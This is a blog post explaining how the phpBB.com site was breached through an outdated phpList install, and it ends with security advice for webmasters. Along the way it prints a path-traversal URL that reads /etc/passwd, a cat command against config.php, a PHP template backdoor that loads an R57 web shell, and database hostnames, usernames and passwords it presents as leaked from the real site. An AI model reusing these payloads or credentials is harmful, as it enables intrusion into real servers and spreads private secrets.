How PHPBB Site was Hacked and How You Can Prevent it

The simplest way to start this topic is, PHPBB is hacked. You must have heard of it by now. And there is an equal chance that you haven’t. A community with almost 200.000 human members and 400,000 subscribed users have lost their privacy inside that community and there was nothing PHPBB could do but to put up a foolish status message like this just below.

But the question is, how did the hacker (say script kiddie if you like, but I don’t think 90% of the people naming him that can do half of what he did. No glorification though) do it? Here is a step by step description.

1. The Vulnerability

PHPList is generally located at the website_name/phplist address. The hacker went there and found out that the forum admins were running an old version of it. Much to his amazement and ours too, it was older than the version which had taken care of the well known milworm exploit. He used it. Isn’t it obvious?

2. Attacking /etc/passwd

Anyone who has even an one cent knowledge of PHP, knows how and what this directory look like. He tried to break through the above mentioned directory through a proxy program.

His Target Link: https://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd

Needless to say, he found it.

3. Reaching httpd.conf

The httpd.conf file is the main configuration file for the Apache web server. You can get directory indexing, HostnameLookups and such services at your finger tips through this. So he moved on to /etc/httpd/conf/httpd.conf.

4. Coding the Error Log

In recent times, we have seen that error log directory can be presented with rewritten or added code. So that was the best place for him to run his code and realize where exactly are the indexing happening and how can he derive the hash code for the community profiles. Like I said, he found out the hash code was f51ee61fe7a83fdf72780912bced0855 and he uploaded his avtaar there so that he could get access to the administrative privileges.

The direct path: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg

5. Second Vulernability

cat /home/virtual/phpbb.com/community/config.php That is where you can find the config details. But how on earth couldn’t the password at least be encrypted? It was just making thigs easier for him.

And here are what he found out

$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5‘;
$table_prefix = ‘community_’;

PHPlist

$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3‘;

6. Cracking Others’ Passwords

There was nothing much left. He found out some of the passwords of other admins. One funny thing is, someone had his password as phpbb! How on earth couldn’t someone bruteforce it. I wonder too.

7. The Final Blow: Getting the Full Database

The hacker got all the entries of user_id and user_password, The user’s passwords were encrypted in  unsalted md5 and their admin’s passwords in common hash. Then if you have been a forum admin of PHP enabled site, you only need to MySql update to one of the admin account’s and you are in. Or if you change their password to yours you can use the recover password function and update the list in SQL and save it to a log file. Which he did eventually. But, again, Recover password like primitive normal user mode for an admin? Oh, PHPBB, you were waiting for a punishment I guess.

8. Writing a Shell Script

This can be a mini tutorial in itself. But what he did here was practically rent a permanent room for himself inside the admin directory. How?

• He enabled php in template files and added this bit of code to one of the templates:
  $ip=$_SERVER['REMOTE_ADDR']; if($ip == “x.x.x.x”){include(”/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f”);}
• Which happened to be a shell, R57shell actually.
• Then he searched for a writable directory and created a php file and wrote the source code to that file. And there he remained.

Word of Caution

Just my two cents of advice to all the webmasters, especially those using php applications like Joomla, phpList, WordPress etc.:

1. Please keep your software updated always. I know it is a royal pain but that is the price you pay for getting it cheap (read free). PHP is a rapid prototyping and development language. It also means anyone, and I mean anyone, can hack up a quick application in few hours which can become popular in the course of time through contributions from the open source community. Using a popular PHP application is no guarantee of their safety as was proved time and again by Mambo / Joomla, WordPress, phpList etc. vulnerabilities.
2. Please use any means to secure or at least obfuscate your passwords to prevent such direct attacks. WordPress, phpBB and many otherPHP based software store their password openly in files, which has been proven time and again to be a bad practice. A vulnerability with any PHP software which allows the hackers to read plain-text files, like the above exploit, can expose the passwords of all other applications in the systems which uses such inane way to store passwords. There are ways to run different applications from different users id’s which will keep them in their own silos. I will discuss more about them in a later article.

The biggest note is for php application developers. Please, please refrain from keeping clear passwords in text files. I am talking to Matt Mullenweg (just because I know his name) of WordPress, Joomla, phpBB, phpList, modX and a host of other php based application developers. I respect what you are doing but please don’t jeopardize the data security of your users.

Game over. thank you.